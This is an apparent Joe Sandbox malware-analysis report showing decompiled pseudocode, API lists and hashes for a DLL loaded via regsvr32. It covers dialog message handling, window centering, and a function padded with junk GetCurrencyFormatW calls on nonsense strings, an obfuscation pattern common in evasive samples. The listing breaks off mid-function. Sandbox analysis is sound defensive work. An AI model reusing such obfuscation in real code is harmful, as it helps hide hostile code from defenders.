Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 69c51003af96275454d602057090bf2f3f4a2519da6507d6aeea24ce666c7f9e
Instruction ID: 0456d89d922e5c10c0a98bb53afe019d0a386320811ad7c1ac40a02f71bd5ba4
Opcode Fuzzy Hash: 69c51003af96275454d602057090bf2f3f4a2519da6507d6aeea24ce666c7f9e
Instruction Fuzzy Hash: 71710875548355AFE304DF51CE82F1BBBE8EBCAB44F01580EF6809B2A1C670E9148F66

Uniqueness

Uniqueness Score: -1.00%

Function 1001AEE4 Relevance: 26.0, APIs: 17, Instructions: 452
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001AEE4(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E1001AD41(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E10009228(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E1000911A( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E1001AD93(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E1001A83E(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if(__eflags == 0) {
								E10004E6E(0, _t232, _t238, _t247, __eflags);
								asm("int3");
								_push(0x28);
								E1001FBF7(E10034708, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E1000A8F0(0, _t232, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E1000A8F0(_t229, _t232, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E1001A7F1(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E1001A7F1(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E1000F80A(_t229, _t232, _t240);
																	} else {
																		_t172 = E1000F7BC(_t229, _t232, _t240);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E1000F366(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E1001A8AF(_a4, _v24, _v44);
																			} else {
																				_t174 = E1000A8F0(_t229, _t232, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E1001A8E9(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E1000F223(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E10007A94(_t255, _v36, _t229);
																			} else {
																				_t191 = E1000A8F0(_t229, _t232, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E1001A8E9(_t244);
																				E1001AAB3(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E1001A88E(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E1001AC34(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E1000EF39(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E1000EFB3(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E1000F010();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E1001AB2E(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E1001A7F1(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E1001AEE4(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E10014E50(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E1000A8F0(_t229, _t232, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E1001AA46(_t232, E1000A8F0(_t229, _t232, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E1001AAB3(_t229, _t232, _t260, _v24, E1000A8F0(_t229, _t232, _t260, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E1001AC61(_a4, _v24, E1000A8F0(_t229, _t234, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E1000A8F0(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E1000A8F0(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E1001FC9C(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E1000F223(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}

APIs

GetFocus.USER32(?), ref: 1001AF37
IsWindowEnabled.USER32(?), ref: 1001AF93
__EH_prolog3_catch.LIBCMT ref: 1001AFE1
GetFocus.USER32(00000028), ref: 1001B001
GetParent.USER32(?), ref: 1001B04C
GetParent.USER32(?), ref: 1001B05C
GetKeyState.USER32 ref: 1001B11A
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1CE
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1E1
GetFocus.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1EE
IsWindow.USER32(?), ref: 1001B206
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B212
IsWindow.USER32(?), ref: 1001B228
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B22E
GetKeyState.USER32 ref: 1001B257
MessageBeep.USER32(00000000), ref: 1001B34E

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: 7cea107795b1e2e3285d96fe1b936d401bf20cc77758f65a3f6ffed830a0db35
Instruction ID: 56f928e57334fa6d51f2d895fa8adec4f86d4fba5de9bb308060e6b64de8da3e
Opcode Fuzzy Hash: 7cea107795b1e2e3285d96fe1b936d401bf20cc77758f65a3f6ffed830a0db35
Instruction Fuzzy Hash: 12F1DF35900A16AFDB11DFA0C894AAE7BF5EF49390F528029F815AF162DB34EDC1CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10003567 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E10003567(int _a4) {
				long _t40;
				signed int _t54;
				int _t55;
				signed int _t63;
				void* _t87;
				short* _t89;

				_t87 = _a4;
				_t35 = 0;
				if(_t87 != 0) {
					_t89 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					if( *((intOrPtr*)(_t87 + 0x10)) != 0) {
						_a4 =  *((intOrPtr*)(_t87 + 4));
						_t63 = GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						 *((intOrPtr*)(_t63 *  *0x100440d8 +  *((intOrPtr*)( *_t87 + 0x28)) + _a4))(_a4, 0, 0);
						_t35 = 0;
					}
					 *0x10046a64( *((intOrPtr*)(_t87 + 0x30)) + GetCurrencyFormatW(_t35, 0x11d4, _t89, _t35, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc * 8);
					_t40 = 0;
					if( *((intOrPtr*)(_t87 + 8)) == 0) {
						L9:
						if( *((intOrPtr*)(_t87 + 4)) != _t40) {
							 *((intOrPtr*)(_t87 + 0x20))( *((intOrPtr*)(_t87 + 4)), 0, GetCurrencyFormatW(_t40, 0x11d4, _t89, _t40, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x8000,  *((intOrPtr*)(_t87 + 0x34)));
							_t40 = 0;
						}
						return HeapFree(GetProcessHeap(), _t40, _t87);
					} else {
						_a4 = 0;
						if(GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_t87 + 0xc)) <= 0) {
							L8:
							 *0x10046a64( *((intOrPtr*)(_t87 + 8)) + GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 4);
							_t40 = 0;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t54 = GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t55 = 0;
							if( *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + (_t54 *  *0x100440cc + _a4) * 4)) != 0) {
								 *((intOrPtr*)(_t87 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + (GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _a4) * 4)),  *((intOrPtr*)(_t87 + 0x34)));
								_t55 = 0;
							}
							_a4 = _a4 + 1;
						} while (_a4 < GetCurrencyFormatW(_t55, 0x11d4, _t89, _t55, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_t87 + 0xc)));
						goto L8;
					}
				}
				return 0;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 100035A3
GetCurrencyFormatW.KERNEL32 ref: 100035CF
??3@YAXPAX@Z.MSVCRT ref: 100035DF
GetCurrencyFormatW.KERNEL32 ref: 10003603
GetCurrencyFormatW.KERNEL32 ref: 10003623
GetCurrencyFormatW.KERNEL32 ref: 1000364D
GetCurrencyFormatW.KERNEL32 ref: 10003679
GetCurrencyFormatW.KERNEL32 ref: 1000369B
??3@YAXPAX@Z.MSVCRT ref: 100036AB
GetCurrencyFormatW.KERNEL32 ref: 100036CA
GetProcessHeap.KERNEL32(00000000,000022B9,?,?,?,?,?,?,?,?,?,?,10003044,10003057,10003090,1000309F), ref: 100036E8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10003044,10003057,10003090,1000309F,00000000), ref: 100036EF

Strings

xadqsavcbdfewescGADW, xrefs: 10003596, 100035C6, 100035F6, 10003618, 10003644, 10003670, 10003690, 100036C1
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000357A, 10003582, 1000359C, 100035CC, 100035FC, 1000361F, 1000364A, 10003676, 10003697, 100036C7

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat$??3@Heap$FreeProcess
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 447117116-3161301136
Opcode ID: c986ef1d440be94ff09f6e1d70f323da872e541a9ac047334e8279f144c68349
Instruction ID: f2d026fc60e697fd50327b110b185c24fe47079f9fec1f7b52e43e207d21a45c
Opcode Fuzzy Hash: c986ef1d440be94ff09f6e1d70f323da872e541a9ac047334e8279f144c68349
Instruction Fuzzy Hash: 7B415B71104705BFE215EB60CD85E67BBECEB4A385F028819F742DB5A1D732E8548F64

Uniqueness

Uniqueness Score: -1.00%

Function 1000A2C4 Relevance: 19.7, APIs: 13, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000A2C4(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1000EEC4(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10008551(_t121, E100084E6(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10005CAE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10008551(_t121, E100084E6(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1000F1A1(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF

GetParent.USER32(?), ref: 1000A2F1
SendMessageA.USER32 ref: 1000A314
GetWindowRect.USER32 ref: 1000A32E
GetWindowLongA.USER32 ref: 1000A344
CopyRect.USER32 ref: 1000A391
CopyRect.USER32 ref: 1000A39B
GetWindowRect.USER32 ref: 1000A3A4
CopyRect.USER32 ref: 1000A3C0

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: 9ff1ffca443c0671e985d08d4d0a79713c159cacf4ec812370c5e182881e21c9
Instruction ID: 63e85339992314f50ad76cd4fa936f515b0dc0fc70569d21828395b99dd1d8a3
Opcode Fuzzy Hash: 9ff1ffca443c0671e985d08d4d0a79713c159cacf4ec812370c5e182881e21c9
Instruction Fuzzy Hash: 2C513F76D00619AFEB01CBA8CC85EEEBBB9EB49390F154214F905B7195D730EE858B60

Uniqueness

Uniqueness Score: -1.00%

Function 100056D9 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100056D9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
